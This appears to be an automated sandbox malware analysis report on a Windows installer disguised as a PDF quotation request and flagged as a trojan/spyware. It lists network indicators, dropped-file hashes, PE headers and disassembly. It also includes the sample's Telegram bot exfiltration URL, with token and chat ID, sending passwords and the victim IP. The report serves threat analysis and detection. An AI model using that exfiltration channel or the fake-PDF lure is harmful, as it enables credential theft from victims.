            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.19.174
            truefalse
              high
              drive.usercontent.google.com
              142.250.181.1
              truefalse
                high
                reallyfreegeoip.org
                104.21.67.152
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    158.101.44.242
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://drive.usercontent.google.com/&xxsREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2685919507.00000000049AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.orgREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035175000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035119000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/botREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://translate.google.com/translate_a/element.jsREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://drive.google.com/REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004938000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://reallyfreegeoip.orgREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://reallyfreegeoip.orgREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.usercontent.google.com/REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004998000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2685919507.00000000049AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.orgREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035287000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035175000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F67000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035119000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://apis.google.comREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://drive.google.com/NkREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004938000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://checkip.dyndns.comREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035287000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035175000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035119000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://nsis.sf.net/NSIS_ErrorErrorREQUEST FOR QUOATION AND PRICES 0910775_pdf.exefalse
                                                            high
                                                            http://api.telegram.orgREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035175000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035119000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://drive.usercontent.google.com/SREQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004998000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2685919507.00000000049AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://reallyfreegeoip.org/xml/REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
142.250.181.1 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
104.21.67.152 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
193.122.130.0 | unknown | United States | 31898 | ORACLE-BMC-31898US | false
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
172.217.19.174 | drive.google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1575710
Start date and time: 2024-12-16 08:42:44 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/8@7/6
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 155
• Number of non-executed functions: 110
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:44:49 | API Interceptor | 558x Sleep call for process: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe modified
                                                                                                            • 158.101.44.242
                                                                                                            AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 193.122.6.168
                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            Non_disclosure_agreement.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 192.29.14.118
                                                                                                                                Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):297598
                                                                                                                                Entropy (8bit):7.688657224637642
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:FAm56jogmL+f52bCMfopSlgiyrhHwK2bLk+WcNwdTmh8gsqSCOT3tR7LNNkuT3e:J5dL+89fwSq9r1wK2/qdTma5qSxztR76
                                                                                                                                MD5:2A7FEAD07C1AB1898ACFC34F55C542A6
                                                                                                                                SHA1:79D3C402330822C990B19919E629A8C1F80951F7
                                                                                                                                SHA-256:BDCE79AB6D8A2F41C5DDCA01ED92967A649940D7DF3B129F7FF8F9106724D142
                                                                                                                                SHA-512:CC84083F1220094A45C5D6A481F4C5827906E0CA956CB4733340A7EA4215857746AE3F93F7775D8B9FE5A63C107DC7922E1CF99F2D7D773051F4775047052A71
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):98603
                                                                                                                                Entropy (8bit):4.616163373193616
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:K3dgAwxhCxiMHamvPqqCVRaxFUwE/YseaV:OwnMiMHrvhEaI/YsJ
                                                                                                                                MD5:E91A98646F5BEC50D0ABD83EDE7CD6D2
                                                                                                                                SHA1:9854E69C818BB7289150470F8011AC56FF21BC72
                                                                                                                                SHA-256:18AAF1D535D7F02D79C4155621054CAC706C6D005992F9F344E2A453796F2C59
                                                                                                                                SHA-512:FAED0EB6046A33C74828CA8647EE9F35544E2BA2879202D5E9908354FA0A2E08182218B55A7E451D600AF6297D96A2E13F475A8E8E8B8658B775FFF5F3C80F75
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):56641
                                                                                                                                Entropy (8bit):1.2318917163845036
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:vrBeaW6xu5Pd9GW0Zq+/HXF1qcGNMUd8phxiFQHOV7hpvZlq:t9+Pdop/306xixrlq
                                                                                                                                MD5:39C9A5F767D8C170B5CE38EA8D5734D4
                                                                                                                                SHA1:4B4CA81EB3D093645B504004F62A269D4EACDECC
                                                                                                                                SHA-256:87A7017021050071DBE5726BF9AC505763CD923E2BDE93336CA0905802CD8D49
                                                                                                                                SHA-512:AE2D66B801251046FA4D3093391B916955B43BE75A954DD398583B1B8881A9F109F51F81D6E4FE759F83AC7B921FA89B02185013AFDE16D3C8EAB422BE89B4FF
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File Type:ASCII text, with very long lines (345), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):345
                                                                                                                                Entropy (8bit):4.241929841155785
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:dvkdMOL4xnuXGNQWjMIDw1luhPB46xAJX7sBJOdkmLA8gMfArpIXbgOwQWiQJEEC:dufExIoDe1lYnGJLsBQdtL6rpIrWQkJA
                                                                                                                                MD5:AE69FE0F4D1E1115BC470031E661785C
                                                                                                                                SHA1:8D3799826FE457C61C1E8EE5E3071683A8125BC5
                                                                                                                                SHA-256:6B18768503395C809263568D3A8858810404C2B7D49DC7CB6CE5F717F5D6C7DE
                                                                                                                                SHA-512:969C0DB048EAC4A9B447A0C0C463A7983F1B4091B6206E274B9D249F8311439B6C33F5AA1EDF9CD1AA27502DA49378D3E1B45F16909C55DF830E51684E9648BE
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:pandas omflakkendes tribrachic miskenning.nonvitally subcase syvendelens weighin.tilhreres lysed metencephalons aabentstaaendes arbejdsmarkedsstyrelsers.kodeskrifter indgaaet nstnederst desulphurise badevgtene caliche.reabsorption erhvervskommunernes aktuarerne ammunition whilere sughs.tusindaarigt barkers landholders butylation phrenicocolic.
                                                                                                                                Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File Type:Matlab v4 mat-file (little endian) ', numeric, rows 63, columns 0
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):210366
                                                                                                                                Entropy (8bit):1.240975322465592
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:vBTwJOLxCIF0V6iLboHog6BQlsMqlN1R0pmGy30wbfq6+9GmlsNh34k0uJ/QohER:cJigyyDJnLH7zA
                                                                                                                                MD5:AEF78D8D561E8802286A78AAC6C73ED6
                                                                                                                                SHA1:DDF5DA649482D0A553802827BB9F0EF64A7069E1
                                                                                                                                SHA-256:45F24543C01C9A11CC2246A9B27569AF433EEF61C877A4E191B683315D3566BE
                                                                                                                                SHA-512:93D43C0CECADF8E1F507F8E58D2B4D92995D8F7ECF213A23559938B380033A6D0D80B0816A8D6603864F821F4FEDC988E0F79BE14C6892089178970E08DC4199
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):363811
                                                                                                                                Entropy (8bit):1.2512349423386382
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:y2f405GRYtnSLOBbyCociR2TVuEpHsVURGxwGmXjyMB+CtKDOgt9rlHF1QOs+9m5:pIuagbnK7CwVwFpYogwhUsvCq
                                                                                                                                MD5:BFEA15C03AB295424981A73637A19491
                                                                                                                                SHA1:A5ADABDDC373D6B3004F96946D84B651E42D9F5C
                                                                                                                                SHA-256:83E9CE74259889DCABD39D41131F286882B224698DCDEB8D0B4074069AAA687B
                                                                                                                                SHA-512:CB5969BFFAED8AF1791938E924E0CC9F876E45165F4E7EA5E9249131FACA831C0600F14BD68EF041D18C81A3FBE087970043D1B3B8A6786C1E5E5049834D4D0D
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11776
                                                                                                                                Entropy (8bit):5.655335921632966
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                                                                                                                MD5:EE260C45E97B62A5E42F17460D406068
                                                                                                                                SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                                                                                                                SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                                                                                                                SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                                                                                                                Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: SWIFT09181-24_pdf.exe, Detection: malicious
• Filename: O0rhQM49FL.exe, Detection: malicious
• Filename: O0rhQM49FL.exe, Detection: malicious
• Filename: 5WP9WCM8qV.exe, Detection: malicious
• Filename: 5WP9WCM8qV.exe, Detection: malicious
• Filename: K8ZvbdkrGx.exe, Detection: malicious
• Filename: K8ZvbdkrGx.exe, Detection: malicious
• Filename: JOSXXL1.exe, Detection: malicious
• Filename: Certificado FNMT-RCM.exe, Detection: malicious
• Filename: Produccion.exe, Detection: malicious
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1162
                                                                                                                                Entropy (8bit):3.26185238901619
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:8wl0+sXU1e/tz0/CSL6/cBnwgXl341DEDeG41DEDlzQ1olfW+kjcmAahCNfBf4tK:8FvWLrFPjPqizZMAjqy
                                                                                                                                MD5:ADDA4886016C22818D8CC39FCA9522C8
                                                                                                                                SHA1:63B94BD19B425DFB90BF6309C2E9089A41613CA4
                                                                                                                                SHA-256:1697857E3EC84DBAAEA743E4B70BC1ACF89F244E277C21956A656BEB92CB9D7B
                                                                                                                                SHA-512:1CF1E5203452D11883F21EB5771C11BDFEF3207407AC78CED3F8AB0239C032D6C3F230ADEFD751E09CDE2DA8958FB2ED35D40EE89778F22A56CF22BD43F208E9
                                                                                                                                Malicious:false
                                                                                                                                Preview:L..................F........................................................q....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....b.1...........mindevrdigt.H............................................m.i.n.d.e.v.r.d.i.g.t.......2...........boghandlermedhjlperens.tor..f............................................b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r...*.../.....\.....\.....\.m.i.n.d.e.v.r.d.i.g.t.\.b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r.P.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.r.a.p.i.d.i.t.e.t.e.n.s.\.f.r.e.m.t.v.i.n.g.............}.............>.e.L.:..er.
                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                Entropy (8bit):7.962503274476573
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File size:475'776 bytes
                                                                                                                                MD5:fd9335d7160883534e42839297a65c7d
                                                                                                                                SHA1:80cd18a77f7896e06adc5bb4eb544e6c7e5bad5d
                                                                                                                                SHA256:7fccb9545a51bb6d40e9c78bf9bc51dc2d2a78a27b81bf1c077eaf405cbba6e9
                                                                                                                                SHA512:18661ad7313f2d366083ac000e48e86bb8c5ec889494ade7488ef7dc81a97adc867753100517d5d86a2e76b283672e1c958811d7f0ffa735388aa88a1cd7dda8
                                                                                                                                SSDEEP:12288:I5AzzWpSFt+rLm8vGaQ/Zwu7Jj1JK8s5FEeKW:ZzzMSFOLmQGaQ/Zwu7Jj1Jicev
                                                                                                                                TLSH:12A42312A270D053F175073B0C127AEEB53AB325AA304A5757983FA93D32791D52BEAC
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........
                                                                                                                                Icon Hash:3d2e0f95332b3399
                                                                                                                                Entrypoint:0x4032a0
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:4
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:4
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:4
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:d4b94e8ee3f620a89d114b9da4b31873
                                                                                                                                Instruction
                                                                                                                                sub esp, 000002D4h
                                                                                                                                push ebp
                                                                                                                                push esi
                                                                                                                                push 00000020h
                                                                                                                                xor ebp, ebp
                                                                                                                                pop esi
                                                                                                                                mov dword ptr [esp+0Ch], ebp
                                                                                                                                push 00008001h
                                                                                                                                mov dword ptr [esp+0Ch], 0040A300h
                                                                                                                                mov dword ptr [esp+18h], ebp
                                                                                                                                call dword ptr [004080B0h]
                                                                                                                                call dword ptr [004080ACh]
                                                                                                                                cmp ax, 00000006h
                                                                                                                                je 00007FF460AE1BF3h
                                                                                                                                push ebp
                                                                                                                                call 00007FF460AE4D36h
                                                                                                                                cmp eax, ebp
                                                                                                                                je 00007FF460AE1BE9h
                                                                                                                                push 00000C00h
                                                                                                                                call eax
                                                                                                                                push ebx
                                                                                                                                push edi
                                                                                                                                push 0040A2F4h
                                                                                                                                call 00007FF460AE4CB3h
                                                                                                                                push 0040A2ECh
                                                                                                                                call 00007FF460AE4CA9h
                                                                                                                                push 0040A2E0h
                                                                                                                                call 00007FF460AE4C9Fh
                                                                                                                                push 00000009h
                                                                                                                                call 00007FF460AE4D04h
                                                                                                                                push 00000007h
                                                                                                                                call 00007FF460AE4CFDh
                                                                                                                                mov dword ptr [00434F04h], eax
                                                                                                                                call dword ptr [00408044h]
                                                                                                                                push ebp
                                                                                                                                call dword ptr [004082A8h]
                                                                                                                                mov dword ptr [00434FB8h], eax
                                                                                                                                push ebp
                                                                                                                                lea eax, dword ptr [esp+34h]
                                                                                                                                push 000002B4h
                                                                                                                                push eax
                                                                                                                                push ebp
                                                                                                                                push 0042B228h
                                                                                                                                call dword ptr [0040818Ch]
                                                                                                                                push 0040A2C8h
                                                                                                                                push 00433F00h
                                                                                                                                call 00007FF460AE48EAh
                                                                                                                                call dword ptr [004080A8h]
                                                                                                                                mov ebx, 0043F000h
                                                                                                                                push eax
                                                                                                                                push ebx
                                                                                                                                call 00007FF460AE48D8h
                                                                                                                                push ebp
                                                                                                                                call dword ptr [00408178h]
                                                                                                                                Programming Language:
                                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x85c8           0xa0          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x5d000          0x11e0        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x2b8         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy            Characteristics
.text   0x1000           0x637c        0x6400    83ff228d6dae8dd738eb2f78afbc793f  False     0.672421875          data       6.491609540807675  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8000           0x147c        0x1600    d9f9b0b330e238260616b62a7a3cac09  False     0.42933238636363635  data       4.973928345594701  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xa000           0x2aff8       0x600     3f2b05c8fbb8b2e4c9c89e93d30e7252  False     0.53125              data       4.133631086111171  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata  0x35000          0x28000       0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x5d000          0x11e0        0x1200    20639f4e7c421f5379e2fb9ea4a1530d  False     0.3684895833333333   data       4.485045860065118  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name           RVA      Size   Type                                                                                Language  Country        ZLIB Complexity
RT_BITMAP      0x5d268  0x368  Device independent bitmap graphic, 96 x 16 x 4, image size 768                      English   United States  0.23623853211009174
RT_ICON        0x5d5d0  0x2e8  Device independent bitmap graphic, 32 x 64 x 4, image size 640                      English   United States  0.42473118279569894
RT_DIALOG      0x5d8b8  0x144  data                                                                                English   United States  0.5216049382716049
RT_DIALOG      0x5da00  0x13c  data                                                                                English   United States  0.5506329113924051
RT_DIALOG      0x5db40  0x100  data                                                                                English   United States  0.5234375
RT_DIALOG      0x5dc40  0x11c  data                                                                                English   United States  0.6056338028169014
RT_DIALOG      0x5dd60  0xc4   data                                                                                English   United States  0.5918367346938775
RT_DIALOG      0x5de28  0x60   data                                                                                English   United States  0.7291666666666666
RT_GROUP_ICON  0x5de88  0x14   data                                                                                English   United States  1.2
RT_MANIFEST    0x5dea0  0x33f  XML 1.0 document, ASCII text, with very long lines (831), with no line terminators  English   United States  0.5547533092659447

DLL | Import
KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
